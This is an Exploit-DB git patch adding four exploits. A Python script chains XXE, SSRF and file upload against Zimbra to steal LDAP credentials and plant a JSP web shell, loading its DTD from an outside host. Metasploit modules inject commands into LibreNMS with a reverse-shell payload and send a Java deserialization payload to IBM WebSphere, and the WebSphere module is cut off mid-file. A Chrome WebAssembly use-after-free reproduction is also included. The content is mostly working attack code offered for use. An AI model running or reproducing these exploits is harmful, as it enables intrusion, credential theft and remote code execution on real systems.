From e76aee5eaf30542e743dad3ef85e637b1957f3b8 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 6 Jun 2019 05:01:56 +0000
Subject: [PATCH] DB: 2019-06-06

4 changes to exploits/shellcodes

Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free
IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)
LibreNMS - addhost Command Injection (Metasploit)

Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery
---
 exploits/jsp/webapps/46967.py    | 107 +++++
 exploits/linux/remote/46970.rb   | 163 ++++++++
 exploits/multiple/dos/46968.html |  75 ++++
 exploits/windows/remote/46969.rb | 650 +++++++++++++++++++++++++++++++
 files_exploits.csv               |   4 +
 5 files changed, 999 insertions(+)
 create mode 100755 exploits/jsp/webapps/46967.py
 create mode 100755 exploits/linux/remote/46970.rb
 create mode 100644 exploits/multiple/dos/46968.html
 create mode 100755 exploits/windows/remote/46969.rb

diff --git a/exploits/jsp/webapps/46967.py b/exploits/jsp/webapps/46967.py
new file mode 100755
index 000000000..7ed085ce6
--- /dev/null
+++ b/exploits/jsp/webapps/46967.py
@@ -0,0 +1,107 @@
+#coding=utf8
+import requests
+import sys
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+base_url=sys.argv[1]
+base_url=base_url.rstrip("/")
+#upload file name and content
+#modify by k8gege
+#Connect "shell.jsp" using K8fly CmdShell
+#Because the CMD parameter is encrypted using Base64(bypass WAF)
+filename = "shell.jsp"
+fileContent = r'<%@page import="java.io.*"%><%@page import="sun.misc.BASE64Decoder"%><%try {String cmd = request.getParameter("tom");String path=application.getRealPath(request.getRequestURI());String dir="weblogic";if(cmd.equals("NzU1Ng")){out.print("[S]"+dir+"[E]");}byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);String xxcmd = new String(binary);Process child = Runtime.getRuntime().exec(xxcmd);InputStream in = child.getInputStream();out.print("->|");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|<-");try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>'
+print(base_url)
+#dtd file url
+dtd_url="https://k8gege.github.io/zimbra.dtd"
+"""
+<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
+<!ENTITY % start "<![CDATA[">
+<!ENTITY % end "]]>">
+<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
+"""
+xxe_data = r"""<!DOCTYPE Autodiscover [
+        <!ENTITY % dtd SYSTEM "{dtd}">
+        %dtd;
+        %all;
+        ]>
+<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
+    <Request>
+        <EMailAddress>aaaaa</EMailAddress>
+        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
+    </Request>
+</Autodiscover>""".format(dtd=dtd_url)
+
+#XXE stage
+headers = {
+    "Content-Type":"application/xml"
+}
+print("[*] Get User Name/Password By XXE ")
+r = requests.post(base_url+"/Autodiscover/Autodiscover.xml",data=xxe_data,headers=headers,verify=False,timeout=15)
+#print r.text
+if 'response schema not available' not in r.text:
+    print("have no xxe")
+    exit()
+
+#low_token Stage
+import re
+pattern_name = re.compile(r"<key name=(\"|")zimbra_user(\"|")>\n.*?<value>(.*?)<\/value>")
+pattern_password = re.compile(r"<key name=(\"|")zimbra_ldap_password(\"|")>\n.*?<value>(.*?)<\/value>")
+username = pattern_name.findall(r.text)[0][2]
+password = pattern_password.findall(r.text)[0][2]
+print(username)
+print(password)
+
+auth_body="""<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
+   <soap:Header>
+       <context xmlns="urn:zimbra">
+           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
+       </context>
+   </soap:Header>
+   <soap:Body>
+     <AuthRequest xmlns="{xmlns}">
+        <account by="adminName">{username}</account>
+        <password>{password}</password>
+     </AuthRequest>
+   </soap:Body>
+</soap:Envelope>
+"""
+print("[*] Get Low Privilege Auth Token")
+r=requests.post(base_url+"/service/soap",data=auth_body.format(xmlns="urn:zimbraAccount",username=username,password=password),verify=False)
+
+pattern_auth_token=re.compile(r"<authToken>(.*?)</authToken>")
+
+low_priv_token = pattern_auth_token.findall(r.text)[0]
+
+#print(low_priv_token)
+
+# SSRF+Get Admin_Token Stage
+
+headers["Cookie"]="ZM_ADMIN_AUTH_TOKEN="+low_priv_token+";"
+headers["Host"]="foo:7071"
+print("[*] Get Admin  Auth Token By SSRF")
+r = requests.post(base_url+"/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",data=auth_body.format(xmlns="urn:zimbraAdmin",username=username,password=password),headers=headers,verify=False)
+
+admin_token =pattern_auth_token.findall(r.text)[0]
+#print("ADMIN_TOKEN:"+admin_token)
+
+f = {
+    'filename1':(None,"whocare",None),
+    'clientFile':(filename,fileContent,"text/plain"),
+    'requestId':(None,"12",None),
+}
+
+headers ={
+    "Cookie":"ZM_ADMIN_AUTH_TOKEN="+admin_token+";"
+}
+print("[*] Uploading file")
+r = requests.post(base_url+"/service/extension/clientUploader/upload",files=f,headers=headers,verify=False)
+#print(r.text)
+print("Shell: "+base_url+"/downloads/"+filename)
+#print("Connect \"shell.jsp\" using K8fly CmdShell\nBecause the CMD parameter is encrypted using Base64(bypass WAF)")
+print("[*] Request Result:")
+s = requests.session()
+r = s.get(base_url+"/downloads/"+filename,verify=False,headers=headers)
+#print(r.text)
+print("May need cookie:")
+print(headers['Cookie'])
\ No newline at end of file
diff --git a/exploits/linux/remote/46970.rb b/exploits/linux/remote/46970.rb
new file mode 100755
index 000000000..c9c305baf
--- /dev/null
+++ b/exploits/linux/remote/46970.rb
@@ -0,0 +1,163 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'LibreNMS addhost Command Injection',
+      'Description'    => %q(
+         This module exploits a command injection vulnerability in the open source
+         network management software known as LibreNMS. The community parameter used
+         in a POST request to the addhost functionality is unsanitized. This parameter
+         is later used as part of a shell command that gets passed to the popen function
+         in capture.inc.php, which can result in execution of arbitrary code.
+
+         This module requires authentication to LibreNMS first.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'mhaskar',       # Vulnerability discovery and PoC
+        'Shelby Pace'    # Metasploit module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2018-20434' ],
+          [ 'URL', 'https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/' ],
+          [ 'URL', 'https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d' ]
+        ],
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          [ 'Linux',
+            {
+              'Platform' => 'unix',
+              'DefaultOptions'  =>  { 'Payload' =>  'cmd/unix/reverse' }
+            }
+          ]
+        ],
+      'DisclosureDate' => '2018-12-16',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+    [
+      OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]),
+      OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
+      OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ])
+    ])
+  end
+
+  def login
+    login_uri = normalize_uri(target_uri.path, 'login')
+    res = send_request_cgi('method' =>  'GET', 'uri'  =>  login_uri)
+    fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200
+
+    cookies = res.get_cookies
+
+    login_res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  login_uri,
+      'cookie'    =>  cookies,
+      'vars_post' =>
+      {
+        'username'  =>  datastore['USERNAME'],
+        'password'  =>  datastore['PASSWORD']
+      }
+    )
+
+    fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302
+
+    cookies = login_res.get_cookies
+    res = send_request_cgi('method' =>  'GET', 'uri'  =>  normalize_uri(target_uri.path), 'cookie' =>  cookies)
+    fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices')
+
+    print_status('Successfully logged into LibreNMS. Storing credentials...')
+    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+    login_res.get_cookies
+  end
+
+  def add_device(cookies)
+    add_uri = normalize_uri(target_uri.path, 'addhost')
+    @hostname = Rex::Text.rand_text_alpha(6...12)
+    comm_payload = "'; #{payload.encoded}#'"
+
+    res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  add_uri,
+      'cookie'    =>  cookies,
+      'vars_post'  =>
+      {
+        'snmp'            =>  'on',
+        'force_add'       =>  'on',
+        'snmpver'         =>  'v2c',
+        'hostname'        =>  @hostname,
+        'community'       =>  comm_payload,
+        'authalgo'        =>  'MD5',
+        'cryptoalgo'      =>  'AES',
+        'transport'       =>  'udp',
+        'port_assoc_mode' =>  'ifIndex'
+      }
+    )
+
+    fail_with(Failure::NotFound, 'Failed to add device') unless res && res.body.include?('Device added')
+    print_good("Successfully added device with hostname #{@hostname}")
+
+    host_id = res.get_html_document.search('div[@class="alert alert-success"]/a[@href]').text
+    fail_with(Failure::NotFound, "Couldn't retrieve the id for the device") if host_id.empty?
+    host_id = host_id.match(/(\d+)/).nil? ? nil : host_id.match(/(\d+)/)
+
+    fail_with(Failure::NotFound, 'Failed to retrieve a valid device id') if host_id.nil?
+
+    host_id
+  end
+
+  def del_device(id, cookies)
+    del_uri = normalize_uri(target_uri.path, 'delhost')
+    res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  del_uri,
+      'cookie'    =>  cookies,
+      'vars_post' =>
+      {
+        'id'      =>  id,
+        'confirm' =>  1
+      }
+    )
+
+    print_status('Unsure if device was deleted. No response received') unless res
+
+    if res.body.include?("Removed device #{@hostname.downcase}")
+      print_good("Successfully deleted device with hostname #{@hostname} and id ##{id}")
+    else
+      print_status('Failed to delete device. Manual deletion may be needed')
+    end
+  end
+
+  def exploit
+    exp_uri = normalize_uri(target_uri.path, 'ajax_output.php')
+    cookies = login
+
+    host_id = add_device(cookies)
+    send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  exp_uri,
+      'cookie'    =>  cookies,
+      'vars_get'  =>
+      {
+        'id'        =>  'capture',
+        'format'    =>  'text',
+        'type'      =>  'snmpwalk',
+        'hostname'  =>  @hostname
+      }
+    )
+
+    del_device(host_id, cookies)
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/dos/46968.html b/exploits/multiple/dos/46968.html
new file mode 100644
index 000000000..b906b3389
--- /dev/null
+++ b/exploits/multiple/dos/46968.html
@@ -0,0 +1,75 @@
+<!--
+VULNERABILITY DETAILS
+https://cs.chromium.org/chromium/src/v8/src/wasm/wasm-objects.cc?rcl=783343158eb1b147df7e6669f1d03c690c878e21&l=1253
+```
+int32_t WasmMemoryObject::Grow(Isolate* isolate,
+                               Handle<WasmMemoryObject> memory_object,
+                               uint32_t pages) {
+[...]
+  Handle<JSArrayBuffer> new_buffer;
+  if (old_buffer->is_shared()) {
+    // Adjust protections for the buffer.
+    if (!AdjustBufferPermissions(isolate, old_buffer, new_size)) {
+      return -1;
+    }
+    void* backing_store = old_buffer->backing_store();
+    if (memory_tracker->IsWasmSharedMemory(backing_store)) {
+      // This memory is shared between different isolates.
+      DCHECK(old_buffer->is_shared());
+      // Update pending grow state, and trigger a grow interrupt on all the
+      // isolates that share this buffer.
+      memory_tracker->SetPendingUpdateOnGrow(old_buffer, new_size);
+      // Handle interrupts for this isolate so that the instances with this
+      // isolate are updated.
+      isolate->stack_guard()->HandleInterrupts();
+      // Failure to allocate, or adjust pemissions already handled here, and
+      // updates to instances handled in the interrupt handler safe to return.
+      return static_cast<uint32_t>(old_size / wasm::kWasmPageSize);
+    }
+    // SharedArrayBuffer, but not shared across isolates. Setup a new buffer
+    // with updated permissions and update the instances.
+    new_buffer =
+        wasm::SetupArrayBuffer(isolate, backing_store, new_size, // ***1***
+                               old_buffer->is_external(), SharedFlag::kShared);
+    memory_object->update_instances(isolate, new_buffer);
+[...]
+```
+
+When `Grow` is called on a `WebAssembly.Memory` object that's backed by a `SharedArrayBuffer`, it
+uses the buffer's backing store pointer to construct a new array buffer[1]. Calling `Detach` on
+shared buffers is prohibited by the spec, so the the method just leaves the old one as it is. Thus
+two array buffers might end up owning the same backing store, and if one of the them got garbage
+collected, the other one would point to a freed memory region.
+
+Blink's SharedArrayBuffer implementation uses reference-counted backing stores, so v8 should
+probably implement something similar.
+
+VERSION
+Google Chrome 73.0.3683.103 (Official Build) (64-bit) (cohort: Stable)
+Chromium 75.0.3758.0 (Developer Build) (64-bit)
+This bug affects the stable branch due to the currently active "WebAssembly Threads" Origin Trial.
+https://developers.chrome.com/origintrials/#/view_trial/-5026017184145473535
+
+REPRODUCTION CASE
+-->
+
+<script>
+function gc() {
+  for (let i = 0; i < 50; ++i) {
+    let buffer = new ArrayBuffer(1024 * 1024);
+  }
+}
+
+setInterval(() => {
+  memory = new WebAssembly.Memory({initial: 1, maximum: 2, shared: true});
+  memory.grow(1);
+  gc();
+  array = new Int8Array(memory.buffer);
+  array[0x1337] = 1;
+});
+</script>
+
+<!--
+CREDIT INFORMATION
+Sergei Glazunov of Google Project Zero
+-->
\ No newline at end of file
diff --git a/exploits/windows/remote/46969.rb b/exploits/windows/remote/46969.rb
new file mode 100755
index 000000000..a7053bdd9
--- /dev/null
+++ b/exploits/windows/remote/46969.rb
@@ -0,0 +1,650 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution',
+      'Description' => %(
+        This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells.
+        NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'b0yd' # @rwincey of [Securifera](https://www.securifera.com/) / Vulnerability Discovery and MSF module author
+        ],
+      'References' =>
+        [
+          ['CVE', '2019-8352'],
+          ['URL', 'https://www-01.ibm.com/support/docview.wss?uid=ibm10883628']
+        ],
+      'Platform' => ['win'],
+      'Targets' =>
+        [
+          [
+            'Windows Binary', {
+              'Arch'     => [ARCH_X86, ARCH_X64],
+              'Platform' => 'win'
+            }
+          ],
+          [
+            'CMD', {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'win',
+              'Payload' => {'Compat' => {'RequiredCmd' => 'generic'}}
+            }
+          ]
+        ],
+      'Privileged' => true,
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'May 15 2019'))
+
+    register_options(
+      [
+        Opt::RPORT(11006), # 11002,11004,11006,etc
+        OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
+        OptRaw.new('SSLVersion', [true, 'Default Version for WASND ', 'SSLv3']),
+        OptRaw.new('SSLVerifyMode', [true, 'SSL verification method', 'CLIENT_ONCE']),
+        OptString.new('SSLCipher', [true, 'SSL Cipher string ', 'ALL'])
+      ]
+    )
+  end
+
+  def cleanup
+    disconnect
+    print_status('Disconnected from IBM Websphere DMGR.')
+    super
+  end
+
+  def exploit
+    command = nil
+
+    if target.name == 'CMD'
+      fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") unless datastore['CMD']
+      command = datastore['CMD']
+    end
+    # Connect to IBM Websphere Application Server
+    connect
+    print_status("Connected to IBM WAS DMGR.")
+
+    node_port = datastore['RPORT']
+
+    # Send packet to add neighbor
+    enc_stream = construct_tcp_node_msg(node_port)
+    send_msg(enc_stream)
+
+    sock.get_once
+    print_status('Server responded')
+
+    # Generate binary name
+    bin_name = rand_text_alpha(8)
+
+    if command
+      command = datastore['CMD']
+      payload_contents = command.to_s
+      print_status('Executing command: ' + payload_contents)
+      bin_name << ".bat"
+    else
+      payload_contents = generate_payload_exe(code: payload.generate)
+      bin_name << ".exe"
+    end
+
+    print_status("Sending payload: #{bin_name}")
+    enc_stream = construct_bcast_task_msg(node_port, "..\\..\\..\\" + bin_name, payload_contents, bin_name)
+    send_msg(enc_stream)
+    register_file_for_cleanup(bin_name)
+  end
+
+  def send_msg(enc_stream)
+    pkt = [0x396fb74a].pack('N')
+    pkt += [enc_stream.length + 1].pack('N')
+    pkt += "\x00"
+    pkt += enc_stream
+
+    # Send msg
+    sock.put(pkt)
+  end
+
+  def construct_tcp_node_msg(node_port)
+    p2p_obj = Rex::Java::Serialization::Model::NewObject.new
+    p2p_obj.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
+    p2p_obj.class_desc.description = build_p2p_node_class(p2p_obj)
+
+    # Create the obj
+    object = Rex::Java::Serialization::Model::NewObject.new
+    object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
+    object.class_desc.description = build_tcp_node_msg(object, 12, "0.0.0.0", node_port, p2p_obj)
+
+    # Create the stream and add the object
+    stream = Rex::Java::Serialization::Model::Stream.new
+    stream.contents = []
+    stream.contents << object
+    stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
+    stream.contents << Rex::Java::Serialization::Model::NullReference.new
+    stream.encode
+  end
+
+  def construct_bcast_task_msg(node_port, filename, byte_str, cmd)
+    # Add upload file argument
+    byte_arr = byte_str.unpack("C*")
+    upfile_arg_obj = build_upfile_arg_class(filename, byte_arr, cmd)
+
+    # Create the obj
+    object = Rex::Java::Serialization::Model::NewObject.new
+    object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
+    object.class_desc.description = build_bcast_run_task_msg(object, 41, "0.0.0.0", node_port, upfile_arg_obj)
+
+    # Create the stream and add the object
+    stream = Rex::Java::Serialization::Model::Stream.new
+    stream.contents = []
+    stream.contents << object
+    stream.encode
+  end
+
+  def build_message(obj, msg_id, msg_type, orig_cell_field_type)
+    # Create the integer field and add the reference
+    id_field = Rex::Java::Serialization::Model::Field.new
+    id_field.type = 'int'
+    id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ID')
+
+    # Create the integer field and add the reference
+    type_field = Rex::Java::Serialization::Model::Field.new
+    type_field.type = 'int'
+    type_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'type')
+
+    # Create the object field and add the reference
+    new_field = Rex::Java::Serialization::Model::Field.new
+    new_field.type = 'object'
+    new_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'originatingCell')
+    new_field.field_type = orig_cell_field_type
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.Message')
+    msg_class_desc.serial_version = 1
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << id_field
+    msg_class_desc.fields << type_field
+    msg_class_desc.fields << new_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
+
+    # Set the member values
+    obj.class_data << ['int', msg_id]
+    obj.class_data << ['int', msg_type]
+    obj.class_data << Rex::Java::Serialization::Model::NullReference.new
+
+    msg_class_desc
+  end
+
+  def build_bcast_flood_msg(obj, msg_type, source_ip, source_port)
+    prng = Random.new
+    msg_id = prng.rand(4294967295)
+
+    # Create the field ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
+
+    msg_obj = build_message(obj, msg_id, msg_type, field_ref)
+
+    # Create the integer field and add the reference
+    id_field = Rex::Java::Serialization::Model::Field.new
+    id_field.type = 'int'
+    id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceMsgID')
+
+    # Create the integer field and add the reference
+    port_field = Rex::Java::Serialization::Model::Field.new
+    port_field.type = 'int'
+    port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceUdpPort')
+
+    # Create the object field and add the reference
+    ip_arr_field = Rex::Java::Serialization::Model::Field.new
+    ip_arr_field.type = 'array'
+    ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceIP')
+    ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.BcastFloodMsg')
+    msg_class_desc.serial_version = 1
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << id_field
+    msg_class_desc.fields << port_field
+    msg_class_desc.fields << ip_arr_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = msg_obj
+
+    # Construct IP Array
+    ip_arr = source_ip.split(".").map(&:to_i)
+    builder = Rex::Java::Serialization::Builder.new
+    values_array = builder.new_array(
+      values_type: 'byte',
+      values: ip_arr,
+      name: '[B',
+      serial: 0x42acf317f8060854e0,
+      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
+    )
+
+    # Set the member values
+    obj.class_data << ['int', msg_id]
+    obj.class_data << ['int', source_port]
+    obj.class_data << values_array
+
+    msg_class_desc
+  end
+
+  def build_tcp_node_msg(obj, msg_type, source_ip, source_port, p2p_obj)
+    prng = Random.new
+    msg_id = prng.rand(4294967295)
+
+    # Create the field type for the origCell
+    field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
+    msg_obj = build_message(obj, msg_id, msg_type, field_type)
+
+    # Create the port field and add the reference
+    boot_time_field = Rex::Java::Serialization::Model::Field.new
+    boot_time_field.type = 'long'
+    boot_time_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bootTime')
+
+    # Create the port field and add the reference
+    tcp_port_field = Rex::Java::Serialization::Model::Field.new
+    tcp_port_field.type = 'int'
+    tcp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'tcpPort')
+
+    # Create the port field and add the reference
+    udp_port_field = Rex::Java::Serialization::Model::Field.new
+    udp_port_field.type = 'int'
+    udp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'udpPort')
+
+    # Create the object field and add the reference
+    ip_arr_field = Rex::Java::Serialization::Model::Field.new
+    ip_arr_field.type = 'array'
+    ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ip')
+    ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
+
+    # Create the task object field and add field_type
+    node_prop_field = Rex::Java::Serialization::Model::Field.new
+    node_prop_field.type = 'object'
+    node_prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'nodeProperty')
+    node_prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Lcom/ibm/son/mesh/AppLevelNodeProperty;")
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.TcpNodeMessage')
+    msg_class_desc.serial_version = 1
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << boot_time_field
+    msg_class_desc.fields << tcp_port_field
+    msg_class_desc.fields << udp_port_field
+    msg_class_desc.fields << ip_arr_field
+    msg_class_desc.fields << node_prop_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = msg_obj
+
+    # Construct IP Array
+    ip_arr = source_ip.split(".").map(&:to_i)
+    builder = Rex::Java::Serialization::Builder.new
+    values_array = builder.new_array(
+      values_type: 'byte',
+      values: ip_arr,
+      name: '[B',
+      serial: 0x42acf317f8060854e0,
+      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
+    )
+
+    # Set the member values
+    obj.class_data << ['long', 0]
+    obj.class_data << ['int', source_port]
+    obj.class_data << ['int', source_port]
+    obj.class_data << values_array
+    obj.class_data << p2p_obj
+
+    msg_class_desc
+  end
+
+  def build_app_node_class(obj)
+    # Create the structured gateway field and add the reference
+    struct_bool_field = Rex::Java::Serialization::Model::Field.new
+    struct_bool_field.type = 'boolean'
+    struct_bool_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'structuredGateway')
+
+    # Create the version field and add the reference
+    version_field = Rex::Java::Serialization::Model::Field.new
+    version_field.type = 'int'
+    version_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'version')
+
+    # Create the object field and add the reference
+    bridge_field = Rex::Java::Serialization::Model::Field.new
+    bridge_field.type = 'object'
+    bridge_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bridgedCellsList')
+    bridge_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/List;')
+
+    # Create the field ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4
+
+    # Create the cellname field and add the reference
+    cellname_field = Rex::Java::Serialization::Model::Field.new
+    cellname_field.type = 'object'
+    cellname_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'cellName')
+    cellname_field.field_type = field_ref
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.AppLevelNodeProperty')
+    msg_class_desc.serial_version = 1
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << struct_bool_field
+    msg_class_desc.fields << version_field
+    msg_class_desc.fields << bridge_field
+    msg_class_desc.fields << cellname_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
+
+    # Set the member values
+    obj.class_data << ['boolean', 0]
+    obj.class_data << ['int', 0]
+    obj.class_data << Rex::Java::Serialization::Model::NullReference.new
+    obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name
+
+    msg_class_desc
+  end
+
+  def build_hashtable_class(obj)
+    # Create the integer field and add the reference
+    load_field = Rex::Java::Serialization::Model::Field.new
+    load_field.type = 'float'
+    load_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'loadFactor')
+
+    # Create the integer field and add the reference
+    threshold_field = Rex::Java::Serialization::Model::Field.new
+    threshold_field.type = 'int'
+    threshold_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'threshold')
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Hashtable')
+    msg_class_desc.serial_version = 0x13BB0F25214AE4B8
+    msg_class_desc.flags = 3
+    msg_class_desc.fields = []
+    msg_class_desc.fields << load_field
+    msg_class_desc.fields << threshold_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
+
+    obj.class_data << ['float', 0.75]
+    obj.class_data << ['int', 8]
+    obj.class_data << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x0b\x00\x00\x00\x03")
+
+    msg_class_desc
+  end
+
+  def build_properties_class
+    # Create the object
+    object = Rex::Java::Serialization::Model::NewObject.new
+    object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
+
+    msg_obj = build_hashtable_class(object)
+
+    # Create the field ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 9
+
+    # Create the integer field and add the reference
+    defaults_field = Rex::Java::Serialization::Model::Field.new
+    defaults_field.type = 'object'
+    defaults_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'defaults')
+    defaults_field.field_type = field_ref
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Properties')
+    msg_class_desc.serial_version = 0x3912D07A70363E98
+    msg_class_desc.flags = 2
